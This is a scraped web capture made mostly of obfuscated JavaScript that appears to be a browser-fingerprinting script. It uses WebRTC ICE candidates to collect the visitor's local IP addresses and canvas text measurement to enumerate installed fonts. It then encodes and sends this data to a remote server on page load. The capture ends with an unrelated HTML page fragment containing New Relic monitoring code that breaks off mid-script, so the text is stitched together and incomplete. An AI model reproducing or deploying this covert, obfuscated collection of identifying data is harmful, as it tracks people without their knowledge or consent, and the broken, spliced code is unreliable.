td_2V.td_1r("\x64\x35\x34\x39\x32\x66\x65\x33\x35\x65\x38\x34\x34\x37\x35\x39\x38\x65\x63\x31\x63\x36\x37\x62\x64\x62\x63\x63\x65\x31\x32\x33\x35\x34\x31\x62\x30\x34\x31\x37\x30\x32\x34\x38\x35\x35\x30\x32\x30\x37\x35\x32\x31\x36\x30\x34\x31\x61\x30\x37\x31\x62\x30\x38\x31\x65\x31\x32\x30\x36\x35\x33\x31\x31\x34\x32\x35\x34\x33\x64\x30\x64\x30\x63\x31\x37\x30\x36\x31\x37\x35\x66\x35\x33\x35\x66\x33\x62\x35\x63\x34\x34\x30\x34\x31\x34\x31\x31\x30\x30\x35\x31\x34\x37\x31\x31\x35\x62\x36\x62\x35\x31\x34\x66\x34\x31\x35\x63\x34\x61\x30\x62\x30\x32\x35\x64\x33\x63\x35\x66\x34\x37\x35\x66\x34\x32\x31\x35\x30\x36\x30\x31\x31\x37\x34\x35\x35\x31\x36\x63\x30\x64\x34\x35\x34\x32\x30\x66\x30\x66\x30\x35\x30\x34\x35\x64\x35\x31\x30\x63\x35\x63\x35\x35\x34\x30\x35\x32\x30\x66\x34\x64\x34\x64\x31\x37\x30\x64\x30\x62\x35\x63\x34\x32\x34\x35\x30\x33\x30\x61\x31\x31\x31\x33\x30\x63\x31\x37\x34\x35\x30\x66\x34\x37\x30\x37\x34\x35\x34\x31\x35\x64\x34\x32\x30\x35\x30\x61\x35\x65\x34\x35\x30\x39\x35\x64\x34\x30\x35\x31"); function td_2E(){var td_MW=1;var td_LZ=td_MW+":"+td_0J+":"+td_2m+";"+td_0G;var td_IV=td_2m;var td_GX={};var td_C0={};var td_vH={};td_GX[td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(0,7)]=false;td_GX[td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(7,9)]=false; var td_nq=null;var td_xB=false;var td_iz=td_E();var td_iQ=false;this.tryAgain=function(){return !td_xB;};function td_AA(){var td_sY="";if(Object.keys(td_GX).length>0){var td_Cy=Object.keys(td_GX).filter(function(td_VS){return td_GX[td_VS]; });if(td_Cy.length>0){td_sY+=td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(16,20)+td_Cy.join(",");}}if(Object.keys(td_C0).length>0){var td_Gs=Object.keys(td_C0).filter(function(td_ou){return td_C0[td_ou]; });if(td_Gs.length>0){td_sY+=td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(36,20)+td_Gs.join(",");}}if(Object.keys(td_vH).length>0){var td_oR=Object.keys(td_vH).filter(function(td_ze){return td_vH[td_ze]; });if(td_oR.length>0){td_sY+=td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(56,13)+td_oR.join(",");}}return td_sY;}this.getFPParams=function(){if(!td_xB){if(((new Date()).getTime()-td_iz)>2000||td_iQ){var td_Pc=td_AA(); if(td_Pc.length>0){td_xB=true;td_nq.close();td_nq=null;return td_Pc;}}}return null;};this.setup=function(){if(!Object||!Object.create){td_xB=true;return;}var td_MV=window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection; if(!td_MV){td_xB=true;return;}this.startWaitTime=td_E();function td_hy(td_Cg){var td_qH=td_Cg.substr(td_Cg.indexOf(td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(69,10))+10).split(" ");if(td_qH!==null&&td_qH.length>7&&td_qH[4]!==null){var td_TK=td_qH[4]; var td_Kp=td_qH[7];if(td_TK.match(/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$/)){td_vH[td_TK]=true;}else{if(td_Kp===Number(481469).toString(30)){td_GX[td_TK]=true;}else{td_C0[td_TK]=true;}}}}try{var td_BJ={optional:[{RtpDataChannels:true}]}; var td_ik=td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(79,5)+td_2o+td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(84,11);var td_AQ={iceServers:[{urls:td_ik+td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(95,3),username:td_LZ,credential:td_IV},{urls:td_ik+td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(98,3),username:td_LZ,credential:td_IV}]}; td_nq=new td_MV(td_AQ,td_BJ);td_nq.onicecandidate=function(td_h6){if(td_h6.candidate){td_hy(td_h6.candidate.candidate);}else{td_iQ=true;}};td_nq.onicegatheringstatechange=function(){if(td_nq!==null){if(td_nq.iceGatheringState===td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123.td_f(101,8)){td_iQ=true; }}};td_nq.createDataChannel(Math.random().toString());var td_or=function(){};var td_zW=function(td_gX){td_nq.setLocalDescription(td_gX,function(){},td_or);};var td_oZ=function(){};if(typeof Promise===[][[]]+""||td_nq.createOffer.length>0){td_nq.createOffer(td_zW,td_oZ); }else{td_nq.createOffer().then(td_zW,td_oZ);}}catch(td_oD){return;}};}td_2V.tdz_8cb08776d2fc4687aebb7596574301d0=new td_2V.td_1r("\x38\x63\x62\x30\x38\x37\x37\x36\x64\x32\x66\x63\x34\x36\x38\x37\x61\x65\x62\x62\x37\x35\x39\x36\x35\x37\x34\x33\x30\x31\x64\x30\x35\x62\x30\x32\x30\x63\x34\x36\x35\x39\x34\x34\x30\x35\x35\x32\x30\x33\x37\x66\x30\x35\x30\x37\x35\x31\x35\x30\x35\x66\x35\x66\x30\x38\x30\x66\x30\x39\x30\x65\x35\x61\x35\x62\x35\x36\x34\x36\x34\x34\x34\x35\x34\x37\x34\x37\x34\x35\x34\x37\x31\x33\x34\x38\x34\x31\x31\x39\x35\x32\x30\x31\x30\x61\x30\x34\x30\x33\x30\x33\x35\x32\x30\x35\x35\x65\x35\x61\x30\x33\x30\x34\x34\x38\x34\x66\x34\x31\x30\x38\x30\x64\x30\x63\x35\x38\x34\x36\x34\x39\x35\x37\x35\x36\x35\x32\x30\x33\x30\x31\x34\x30\x34\x39\x34\x34\x34\x33\x35\x64\x31\x31\x30\x62\x35\x36\x30\x66\x30\x35\x34\x37\x34\x65\x34\x34\x31\x35\x34\x31\x34\x66\x31\x34\x35\x62\x35\x37\x35\x39\x30\x65\x31\x36\x31\x32\x30\x33\x35\x34\x35\x30\x31\x65\x31\x61\x31\x35\x34\x34\x35\x31\x34\x31\x35\x39\x35\x37\x34\x32\x34\x37\x30\x35\x34\x35\x30\x38\x35\x36\x35\x36\x30\x61\x31\x31\x35\x63\x30\x32\x35\x61\x35\x62\x34\x35\x35\x65\x35\x30\x34\x63\x35\x39\x35\x63\x35\x35\x35\x38\x34\x34\x35\x64\x35\x33\x34\x64\x35\x38\x30\x38\x30\x36\x30\x65\x35\x61\x35\x35\x31\x37\x30\x65\x35\x36\x35\x34\x35\x65\x34\x34\x35\x61\x35\x63\x30\x61"); var td_2V=td_2V||{};var td_1S;function td_2C(){try{var td_m0=td_3h.getFontsList();if(td_m0.length===0){return;}var td_o7=document.createElement(td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(0,6));if(!td_o7||!td_o7.getContext){return; }var td_X8=td_o7.getContext(td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(6,2));if(!td_X8){return;}if(typeof td_X8.measureText===[][[]]+""){return;}var td_ko=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(8,36); td_X8.font=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(44,14);var td_YS=td_X8.measureText(td_ko).width;td_X8.font=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(58,10);var td_jy=td_X8.measureText(td_ko).width; var td_jm=td_E();var td_Q3=0;var td_RG=0;var td_Av="";var td_mb=false;for(var td_d3=0;td_d3<td_m0.length;td_d3++){td_X8.font=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(68,6)+td_m0[td_d3]+td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(74,12); var td_FD=td_X8.measureText(td_ko).width;td_X8.font=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(68,6)+td_m0[td_d3]+td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(86,8);var td_fK=td_X8.measureText(td_ko).width; if(td_YS!==td_FD||td_jy!==td_fK){td_RG++;td_Av+=","+td_m0[td_d3];}if(td_1S>0&&(td_d3%5)===0){td_Q3=td_E()-td_jm;if(td_Q3>td_1S){td_mb=true;break;}}}if(!td_Av){return;}if(td_Q3===0){td_Q3=td_E()-td_jm;}var td_Iy=td_0h(td_Av); var td_WT="";if(td_3x!==null){td_WT+=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(94,3)+td_3x;}if(!td_mb){td_WT+=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(97,5)+td_RG+td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(102,5)+td_Iy+td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(107,8)+td_Q3+":"+td_RG; }else{td_WT+=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(115,8)+td_Q3+":"+td_RG;}var td_zh=td_Av.length;var td_p0=false;if(typeof td_0A!==[][[]]+""){td_p0=td_0A;}if(td_zh>0&&td_p0&&!td_mb){var td_NA=1800; if(td_zh>td_NA&&td_2h._eq(td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(123,2))&&td_3M._eq("6")){var td_WJ=td_Av.indexOf(",",td_NA);if(td_WJ!==-1){td_zh=td_WJ;}}td_WT+=td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(125,5)+td_Av.substring(0,td_zh); }var td_UR=td_3Y+td_2V.tdz_8cb08776d2fc4687aebb7596574301d0.td_f(130,4)+td_2V.td_2u(td_WT,td_2m);td_0K(td_UR,document);}catch(td_gX){}}td_1S = 1001;var td_3w=['Andale Mono','Arial','Arial Black','AR PL UKai CN','AR PL UMing CN','Batang','Bitstream Vera Sans','Comic Sans MS','Courier New','Cursor','DejaVu LGC Sans','DejaVu Sans','DejaVu Sans Mono','DejaVu Serif','Dotum','Droid Sans','FreeMono','FreeSans','FreeSerif','gargi','Garuda','Georgia','Hei','Impact','KacstArt','Kedage','Khmer OS','Khmer OS System','Kinnari','Liberation Sans Narrow','Lohit Bengali','Loma','Lucida Bright','Lucida Sans','Lucida Sans Typewriter','Luxi Mono','Mallige','Meera','Monospace','mry_KacstQurn','Mukti Narrow','NanumGothic','NanumMyeongjo','Nimbus Sans L Condensed','Norasi','OpenSymbol','ori1Uni','Phetsarath OT','Pothana2000','Purisa','Rachana','Rekha','Saab','Sawasdee','System','TakaoPGothic','Times','Times New Roman','TlwgMono','TlwgTypewriter','Tlwg Typist','Tlwg Typo','Trebuchet MS','Ubuntu','Ubuntu Condensed','Ume Gothic','Ume Mincho','Ume P Gothic','Ume P Mincho','Ume UI Gothic','Umpush','UnBatang','UnDinaru','UnDotum','UnGraphic','UnGungseo','UnPilgi','Untitled1','Utopia','Vemana2000','Verdana','Waree','Webdings','WenQuanYi Bitmap Song','WenQuanYi Micro Hei','WenQuanYi Zen Hei'];var td_1i=['18thCentury','8514oem','AcmeFont','Adobe Arabic','Agency FB','Aharoni','Aldhabi','Alfredo','Algerian','Alien Encounters','Almonte Snow','Amethyst','Andalus','Aparajita','Arabic Transparent','Arabic Typesetting','AR BERKLEY','Arial Baltic','Arial CE','Arial CYR','Arial Greek','Arial Narrow','Arial Rounded MT Bold','Arial TUR','Arial Unicode MS','Arimo','AR JULIAN','Asimov','Autumn','Baby Kruffy','Balthazar','Baskerville','Baskerville Old Face','Bastion','Batang','BatangChe','Bauhaus 93','Bellerose','Bell MT','Berlin Sans FB','Berlin Sans FB Demi','Bernard MT Condensed','Birch Std','Bitstream Vera Sans','Blackadder ITC','Blackoak Std','BN Jinx','BN Machine','Bobcat','Bodoni MT','Bodoni MT Black','Bodoni MT Poster Compressed','BolsterBold','Book Antiqua','Bookman Old Style','Bookshelf Symbol 7','Borealis','BOUTON International Symbols','Bradley Hand ITC','Brandish','Britannic Bold','Broadway','Browallia New','BrowalliaUPC','Brush Script MT','Brush Script Std','Brussels','Calibri','Calibri Light','Californian FB','Calisto MT','Calligraphic','Calvin','Cambria','Cambria Math','Candara','Candles','Castellar','Centaur','Century','Century Gothic','Century Schoolbook','Chaparral Pro','Chaparral Pro Light','Charlemagne Std','Chiller','Chinyen','Clarendon','Colbert','Colonna MT','Comic Sans MS','Commons','Consolas','Constantia','Coolsville','Cooper Black','Cooper Std Black','Copperplate','Corbel','Cordia New','CordiaUPC','Corporate','Courier New Baltic','Courier New CE','Cracked Johnnie','Creepygirl','Curlz MT','DaunPenh','David','Dayton','DejaVu Sans','Deneane','Detente','DFKai-SB','Digifit','DilleniaUPC','Distant Galaxy','DokChampa','Dominican','Dotum','DotumChe','Ebrima','Edwardian Script ITC','Elephant','Emmett','Engravers MT','Enliven','Eras Bold ITC','Ethnocentric','EucrosiaUPC','Euphemia','Expressway Rg','FangSong','Felix Titling','Fingerpop','Fixedsys','Flubber','Footlight MT Light','Forte','Frankfurter Venetian TT','Franklin Gothic Book','Franklin Gothic Medium Cond','FrankRuehl','FreesiaUPC','Freestyle Script','French Script MT','Gabriola','Gadugi','Garamond','Gazzarelli','Gentium Basic','Gentium Book Basic','Geotype TT','Giddyup Std','Gigi','Gill Sans','Gill Sans MT','Gill Sans MT Condensed','Gill Sans MT Ext Condensed Bold','Gill Sans Ultra Bold','Gill Sans Ultra Bold Condensed','Gisha','Glockenspiel','Gloucester MT Extra Condensed','Good Times','Goudy Old Style','Goudy Stout','Greek Diner Inline TT','Gulim','GulimChe','Gungsuh','GungsuhChe','Haettenschweiler','Hand Me Down S (BRK)','Hansen','Harlow Solid Italic','Harrington','Harvest','HarvestItal','Haxton Logos TT','Heavy Heap','Hei','Helvetica','Helvetica LT Std','HelveticaNeueLT Com 107 XBlkCn','Highboot','High Tower Text','Hobo Std','Hollywood Hills','Hombre','Huxley Titling','Imprint MT Shadow','Induction','Informal Roman','IrisUPC','Iskoola Pota','Italianate','JasmineUPC','Jokerman','Juice ITC','Kai','KaiTi','Kalinga','Kartika','Khmer UI','KodchiangUPC','Kokila','Kozuka Gothic Pr6N B','Kristen ITC','Kunstler Script','Lao UI','Latha','Leelawadee','Letter Gothic Std','LetterOMatic!','Levenim MT','LilyUPC','Limousine','Lithos Pro Regular','LittleLordFontleroy','Lucida Bright','Lucida Calligraphy','Lucida Fax','Lucida Handwriting','Lucida Sans Typewriter','Mael','Magneto','Maiandra GD','Malgun Gothic','Manorly','Martina','Matura MT Script Capitals','Meiryo','Meiryo UI','MelodBold','Mesquite Std','Microsoft Himalaya','Microsoft JhengHei','Microsoft JhengHei UI','Microsoft New Tai Lue','Microsoft PhagsPa','Microsoft Tai Le','Microsoft Uighur','Microsoft YaHei','Microsoft YaHei UI','Microsoft Yi Baiti','Minerva','MingLiU','MingLiU-ExtB','MingLiU_HKSCS','Minion Pro','Miriam','Mistral','Modern','Modern No. 20','Mongolian Baiti','Monotype Corsiva','MoolBoran','Moonbeam','MS Gothic','MS Mincho','MS Outlook','MS PGothic','MS PMincho','MS Reference Sans Serif','MS Reference Specialty','MS Sans Serif','MS Serif','MS UI Gothic','MT Extra','Myanmar Text','Mycalc','Myriad Arabic','Myriad Hebrew','Myriad Pro','Narkisim','Nasalization','Neon Lights','Niagara Engraved','Niagara Solid','Nina','Nirmala UI','Notram','November','NSimSun','Nueva Std','Nueva Std Cond','Nyala','OCR A Extended','OCR A Std','Old English Text MT','Onyx','OpenSymbol','OpineHeavy','Orator Std','Palace Script MT','Palatino','Papyrus','Parchment','Parry Hotter','PenultimateLight','Perpetua','Perpetua Titling MT','PhrasticMedium','Pirate','Plantagenet Cherokee','Playbill','PMingLiU','PMingLiU-ExtB','Poor Richard','Poplar Std','PR Celtic Narrow','Prestige Elite Std','Pristina','QuiverItal','Rage Italic','Ravie','Rockwell','Rockwell Condensed','Rod','Roland','Rondalo','Rosewood Std Regular','RowdyHeavy','Russel Write TT','Sakkal Majalla','Salina','Script','Script MT Bold','Segoe Print','Segoe UI Semilight','Segoe UI Symbol','SF Movie Poster','Shonar Bangla','Showcard Gothic','SimHei','Simplified Arabic','Simplified Arabic Fixed','SimSun','SimSun-ExtB','Skinny','Small Fonts','Snap ITC','Snowdrift','Source Code Pro','Splash','Stencil','Stencil Std','Stephen','SWGamekeys MT','System','Tarzan','Tekton Pro','Tekton Pro Cond','Tekton Pro Ext','Tempus Sans ITC','Terminal','Terminator Two','Times New Roman Baltic','Toledo','Traditional Arabic','Trajan Pro','Tw Cen MT','Urdu Typesetting','Utsaah','Valken','Vani','Vijaya','Viner Hand ITC','Vivaldi','Vivian','Vladimir Script','Vrinda','Waverly','Whimsy TT','Wide Latin','Wingdings 2','Woodcut','X-Files','Year supply of fairy cakes'];var td_2b=['Abadi MT Condensed Extra Bold','Abadi MT Condensed Light','Al Bayan Bold','Al Bayan Plain','American Typewriter Bold','American Typewriter Condensed','American Typewriter Light','Apple Braille Outline 6 Dot','Apple Braille Pinpoint 6 Dot','AppleGothic Regular','Apple LiGothic Medium','Apple LiSung Light','AppleMyungjo Regular','Apple SD Gothic Neo','Apple SD GothicNeo ExtraBold','Apple SD Gothic Neo Regular','Arial Bold','Arial Bold Italic','Arial Hebrew Bold','Arial Italic','Arial Narrow Bold','Arial Narrow Bold Italic','Arial Narrow Italic','Avenir','Avenir Black','Avenir Next','Avenir Next Bold','Avenir Next Condensed','Avenir Next Condensed Bold','Avenir Next Demi Bold','Avenir Next Heavy','Avenir Next Regular','Bangla MN Bold','Bangla Sangam MN Bold','Baskerville Bold','Baskerville Bold Italic','Baskerville SemiBold','Baskerville SemiBold Italic','Bell MT Bold','Bell MT Italic','Bernard MT Condensed','Big Caslon Medium','Book Antiqua','Book Antiqua Bold','Bookman Old Style','Bookman Old Style Bold','Bookshelf Symbol 7','Braggadocio','Britannic Bold','Brush Script MT Italic','Calibri','Calibri Bold','Calibri Light','Calisto MT','Calisto MT Bold','Cambria','Cambria Bold','Cambria Math','Candara Bold','Century','Century Gothic','Century Gothic Bold','Century Schoolbook','Century Schoolbook Bold','Chalkboard Bold','Chalkboard SE','Chalkboard SE Bold','Cochin Bold','Colonna MT','Comic Sans MS Bold','Consolas','Consolas Bold','Constantia','Constantia Bold','Cooper Black','Copperplate Bold','Copperplate Gothic Bold','Copperplate Light','Corbel','Corbel Bold','Corsiva Hebrew Bold','Courier Bold','Courier New Bold','Courier New Italic','Courier Oblique','Curlz MT','Damascus Bold','Desdemona','Devanagari MT Bold','Didot Bold','Edwardian Script ITC','Engravers MT','Engravers MT Bold','Euphemia UCAS Bold','Eurostile','Eurostile Bold','Footlight MT Light','Franklin Gothic Book','Franklin Gothic Book Italic','Franklin Gothic Medium','Franklin Gothic Medium Italic','Futura Condensed ExtraBold','Futura Medium','Gabriola','Garamond','Garamond Bold','Geeza Pro Bold','Georgia Bold','Gill Sans Bold','Gill Sans MT','Gill Sans MT Bold','Gill Sans MT Italic','Gill Sans Ultra Bold','Gloucester MT Extra Condensed','Goudy Old Style','Goudy Old Style Bold','Gujarati MT Bold','Gujarati Sangam MN Bold','Gulim','GungSeo Regular','Gurmukhi MN Bold','Gurmukhi Sangam MN','Gurmukhi Sangam MN Bold','Haettenschweiler','Harrington','HeadLineA Regular','Hei Regular','Heiti SC Light','Heiti TC Light','Helvetica Bold','Helvetica CY Bold','Helvetica CY Plain','Helvetica Light','Helvetica Neue Bold','Helvetica Neue Medium','Helvetica Oblique','Hiragino Kaku Gothic ProN W3','Hiragino Kaku Gothic Pro W3','Hiragino Kaku Gothic StdN W8','Hiragino Maru Gothic ProN W4','Hiragino Mincho ProN W3','Hiragino Mincho ProN W6','Hiragino Sans GB W3','Hiragino Sans GB W6','Hoefler Text Black','Hoefler Text Ornaments','Imprint MT Shadow','Kailasa Regular','Kai Regular','Kaiti SC','Kaiti SC Black','Kannada MN Bold','Kannada Sangam MN Bold','Kefa Bold','Khmer MN Bold','Kino MT','Kokonor Regular','Lucida Blackletter','Lucida Bright','Lucida Bright Demibold','Lucida Bright Demibold Italic','Lucida Bright Italic','Lucida Calligraphy','Lucida Calligraphy Italic','Lucida Console','Lucida Fax','Lucida Fax Demibold','Lucida Fax Regular','Lucida Grande Bold','Lucida Handwriting','Lucida Handwriting Italic','Lucida Sans','Lucida Sans Demibold Italic','Lucida Sans Typewriter','Lucida Sans Typewriter Bold','Lucida Sans Unicode','Malayalam MN Bold','Malayalam Sangam MN Bold','Marion','Marion Bold','Marker Felt Thin','Marlett','Matura MT Script Capitals','Meiryo','Meiryo Bold','Menlo Bold','Microsoft Himalaya','Microsoft Tai Le','Microsoft Tai Le Bold','Microsoft Yi Baiti','MingLiU','MingLiU-ExtB','MingLiU_HKSCS','Mistral','Modern','Modern No. 20','Mongolian Baiti','Monotype Corsiva','Monotype Sorts','MS Gothic','Mshtakan Bold','MS Mincho','MS PGothic','MS PMincho','MS Reference Sans Serif','MS Reference Specialty','MT Extra','Myanmar MN Bold','NanumGothic','Nanum Gothic','NanumGothic Bold','NanumMyeongjo','Nanum Myeongjo','NanumMyeongjo Bold','New Peninim MT Bold','News Gothic MT','News Gothic MT Bold','Noteworthy Bold','Onyx','Optima Bold','Optima Regular','Oriya MN Bold','Oriya Sangam MN Bold','Osaka-Mono','Palatino Bold','Palatino Linotype','Palatino Linotype Bold','Papyrus Condensed','PCMyungjo Regular','Perpetua','Perpetua Bold','Perpetua Titling MT','Perpetua Titling MT Bold','PilGi Regular','Playbill','PMingLiU','PMingLiU-ExtB','PT Sans Bold','PT Sans Caption Bold','PT Sans Narrow Bold','Raanana Bold','Rockwell','Rockwell Bold','Rockwell Extra Bold','Rockwell Italic','SimHei','SimSun','Sinhala MN Bold','Sinhala Sangam MN Bold','Skia Regular','Songti SC','Songti SC Black','Stencil','STIXGeneral-Bold','STIXGeneral-Regular','STIXIntegralsD-Bold','STIXIntegralsSm-Bold','STIXIntegralsUp-Bold','STIXIntegralsUpD-Bold','STIXIntegralsUpD-Regular','STIXIntegralsUp-Regular','STIXIntegralsUpSm-Bold','STIXNonUnicode-Bold','STIXSizeFiveSym-Regular','STIXSizeFourSym-Bold','STIXSizeOneSym-Bold','STIXSizeThreeSym-Bold','STIXSizeTwoSym-Bold','STIXVariants-Bold','STXihei','Tahoma Negreta','Tamil MN Bold','Tamil Sangam MN Bold','Telugu MN Bold','Telugu Sangam MN Bold','Thonburi Bold','Times Bold','Times New Roman Bold','Times New Roman Italic','Times Roman','Trebuchet MS Bold','Tw Cen MT','Tw Cen MT Bold','Tw Cen MT Italic','Verdana Bold','Wide Latin','Yuppy SC','Yuppy SC Regular','Yuppy TC','Yuppy TC Regular'];var td_3z=['AR PL UKai CN','AR PL UMing CN','AR PL UMing HK','AR PL UMing TW','AR PL UMing TW MBE','Andale Mono','Arial','Arial Black','Arial Unicode MS','Baskerville','Batang','Bitstream Charter','Bitstream Vera Sans','Carrois Gothic SC','Century Schoolbook L','Comic Sans MS','Courier 10 Pitch','Courier New','Cursor','Cutive Mono','Dancing Script','DejaVu LGC Sans','DejaVu Sans','DejaVu Sans Mono','DejaVu Serif','Dingbats','Dotum','Droid Sans','Droid Sans Mono','FreeMono','FreeSans','FreeSerif','Garuda','Gentium','GentiumAlt','Georgia','Goudy','Hei','ITC Stone Serif','Impact','KacstArt','KacstBook','KacstDecorative','KacstDigital','KacstFarsi','KacstLetter','KacstNaskh','KacstOffice','KacstOne','KacstPen','KacstPoster','KacstQurn','KacstScreen','KacstTitle','KacstTitleL','Kedage','Khmer OS','Khmer OS System','Kinnari','Liberation Mono','Liberation Sans','Liberation Sans Narrow','Liberation Serif','Lohit Bengali','Lohit Devanagari','Lohit Gujarati','Lohit Hindi','Lohit Punjabi','Lohit Tamil','Loma','Lucida Bright','Lucida Sans','Lucida Sans Typewriter','Luxi Mono','Mallige','Meera','Monaco','Monospace','MotoyaLMaru','Mukti Narrow','NanumBarunGothic','NanumGothic','NanumGothicCoding','NanumMyeongjo','Nimbus Mono L','Nimbus Roman No9 L','Nimbus Sans L','Nimbus Sans L Condensed','Norasi','Noto Emoji','Noto Naskh Arabic','Noto Sans','Noto Serif','OldeEnglish','OpenSymbol','Palatino','Phetsarath OT','Pothana2000','Purisa','Rachana','Rekha','Roboto','Saab','Samyak Tamil','Sans','Sawasdee','Serif','Standard Symbols L','System','TakaoExGothic','TakaoExMincho','TakaoGothic','TakaoMincho','TakaoPGothic','TakaoPMincho','Times','Times New Roman','Tlwg Typist','Tlwg Typo','TlwgMono','TlwgTypewriter','Trebuchet MS','URW Bookman L','URW Chancery L','URW Gothic L','URW Palladio L','Ubuntu','Ubuntu Condensed','Ubuntu Mono','Ume Gothic','Ume Mincho','Ume P Gothic','Ume P Mincho','Ume UI Gothic','Umpush','UnBatang','UnDinaru','UnDotum','UnGraphic','UnGungseo','UnPilgi','Untitled1','Utopia','Vemana2000','Verdana','Waree','Webdings','WenQuanYi Bitmap Song','WenQuanYi Micro Hei','WenQuanYi Micro Hei Mono','WenQuanYi Zen Hei','Zawgyi-One','gargi','mry_KacstQurn','ori1Uni'];var td_1c=['AR PL UMing CN','AR PL UMing HK','AR PL UMing TW','AR PL UMing TW MBE','Arial','Arial Unicode MS','Baskerville','Bitstream Charter','Carrois Gothic SC','Century Schoolbook L','Copperplate','Courier 10 Pitch','Courier New','Cutive Mono','Dancing Script','DejaVu Sans','DejaVu Sans Mono','DejaVu Serif','Didot','Dingbats','Droid Sans Mono','FreeMono','FreeSans','FreeSerif','Futura','Garuda','Georgia','Gill Sans','Helvetica','Hoefler Text','KacstArt','KacstBook','KacstDecorative','KacstDigital','KacstFarsi','KacstLetter','KacstNaskh','KacstOffice','KacstOne','KacstPen','KacstPoster','KacstQurn','KacstScreen','KacstTitle','KacstTitleL','Kedage','Khmer OS','Khmer OS System','Kinnari','Liberation Mono','Liberation Sans','Liberation Sans Narrow','Liberation Serif','Lohit Bengali','Lohit Gujarati','Lohit Hindi','Lohit Punjabi','Lohit Tamil','Loma','Lucida Grande','Mallige','Meera','Monaco','Monospace','MotoyaLMaru','Mukti Narrow','NanumGothic','NanumMyeongjo','Nimbus Mono L','Nimbus Roman No9 L','Nimbus Sans L','Norasi','Noto Emoji','Noto Naskh Arabic','Noto Sans','Noto Sans Armenian','Noto Sans Bengali','Noto Sans Canadian Aboriginal','Noto Sans Cherokee','Noto Sans Devanagari','Noto Sans Ethiopic','Noto Sans Georgian','Noto Sans Gujarati','Noto Sans Gurmukhi','Noto Sans Hebrew','Noto Sans JP','Noto Sans KR','Noto Sans Kannada','Noto Sans Khmer','Noto Sans Lao','Noto Sans Malayalam','Noto Sans Myanmar','Noto Sans Oriya','Noto Sans SC','Noto Sans Sinhala','Noto Sans Symbols','Noto Sans TC','Noto Sans Tamil','Noto Sans Telugu','Noto Sans Thai','Noto Sans Yi','Noto Serif','OpenSymbol','Optima','Palatino','Palatino Linotype','Papyrus','Phetsarath OT','Pothana2000','Purisa','Rachana','Rekha','Roboto','Saab','Sans','Sawasdee','Serif','Standard Symbols L','Symbol','TAMu_Kadambri','TAMu_Kalyani','TAMu_Maduram','TSCu_Comic','TSCu_Paranar','TSCu_Times','TakaoExGothic','TakaoExMincho','TakaoGothic','TakaoMincho','TakaoPGothic','TakaoPMincho','Tlwg Typist','Tlwg Typo','TlwgMono','TlwgTypewriter','Trebuchet MS','URW Bookman L','URW Chancery L','URW Gothic L','URW Palladio L','Ubuntu','Ubuntu Condensed','Ubuntu Mono','Umpush','UnBatang','UnDinaru','UnDotum','UnGraphic','UnGungseo','UnPilgi','Untitled1','Vemana2000','Verdana','Waree','WenQuanYi Micro Hei','WenQuanYi Micro Hei Mono','Zawgyi-One','gargi','mry_KacstQurn','ori1Uni'];td_0r();
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var 